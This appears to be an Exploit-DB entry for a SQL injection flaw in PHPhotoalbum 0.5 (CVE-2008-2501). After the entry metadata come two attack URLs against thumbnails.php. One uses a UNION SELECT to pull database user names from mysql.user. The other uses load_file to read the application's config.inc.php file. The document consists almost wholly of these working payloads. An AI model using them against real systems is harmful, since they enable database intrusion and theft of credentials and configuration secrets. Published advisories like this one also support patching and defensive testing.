PHPhotoalbum 0.5 - SQL Injection

Author: Stack
type: webapps
platform: php
port: 
date_added: 2009-12-20  
date_updated:   
verified: 1  
codes: CVE-2008-2501;OSVDB-45677  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comPHPhotoalbum-0.5.zip  

raw file: 10590.txt  

# Title: PHPhotoalbum Remote sql injection Vulnerability
# Tested on: windows

http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--



http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--